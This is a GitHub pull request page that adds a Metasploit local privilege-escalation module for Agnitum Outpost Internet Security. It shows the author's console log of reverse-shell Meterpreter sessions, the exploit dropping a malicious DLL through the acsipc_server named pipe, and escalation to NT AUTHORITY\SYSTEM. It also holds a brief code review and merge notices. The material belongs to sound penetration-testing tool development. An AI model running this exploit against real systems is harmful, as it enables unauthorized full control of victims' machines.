Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add module for OSVDB 96208 #2351

Merged
merged 2 commits into from Sep 12, 2013
Merged

Add module for OSVDB 96208 #2351

merged 2 commits into from Sep 12, 2013

Conversation

jvazquez-r7
Copy link
Contributor

Tested with Agnitum Outpost Internet Security 8.1 on Windows 7 SP1 (32 bits and 64 bits (executing payload with WOW))

Test:

msf exploit(handler) > set lhost 192.168.172.1
lhost => 192.168.172.1
msf exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 192.168.172.239
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.239:49189) at 2013-09-11 00:06:32 -0500

meterpreter > sysinfo
Computer        : WIN-E8OO67TALQA
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Meterpreter     : x86/win32
meterpreter > getuid
Server username: WIN-E8OO67TALQA\juan
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use exploit/windows/local/agnitum_outpost_acs 
msf exploit(agnitum_outpost_acs) > set session 1
session => 1
msf exploit(agnitum_outpost_acs) > check
[*] The target service is running, but could not be validated.
msf exploit(agnitum_outpost_acs) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.0.3:4444 
[*] Opening named pipe...
[+] \\.\pipe\acsipc_server found! Proceeding...
[*] Using C:\Users\juan\AppData\Local\Temp to drop malicious DLL...
[*] Writing malicious DLL to remote filesystem
[*] Exploiting through \\.\pipe\acsipc_server...
[*] Sending stage (752128 bytes) to 192.168.0.3
[*] Meterpreter session 2 opened (192.168.0.3:4444 -> 192.168.0.3:51522) at 2013-09-11 00:06:57 -0500
[+] Deleted C:\Users\juan\AppData\Local\Temp\xlulGZzMladzqRyfyt.dll

meterpreter > sysinfo
Computer        : WIN-E8OO67TALQA
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Meterpreter     : x86/win32
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > exit

Meatballs1
Meatballs1 reviewed Sep 11, 2013
View reviewed changes
modules/exploits/windows/local/agnitum_outpost_acs.rb
end

def junk(n=4)
return rand_text_alpha(n).unpack("V").first
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

It doesn't look like n makes any difference if > 4 ?

wchen-r7 added a commit that referenced this pull request Sep 12, 2013
@wchen-r7
Land #2351 - Agnitum Outpost Internet Security Local Privilege Escala…
3438366 
…tion
@wchen-r7 wchen-r7 merged commit 9ad1be7 into rapid7:master Sep 12, 2013
@jvazquez-r7 jvazquez-r7 deleted the outpost_local branch November 18, 2014 15:53
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
3 participants
@jvazquez-r7 @Meatballs1 @wchen-r7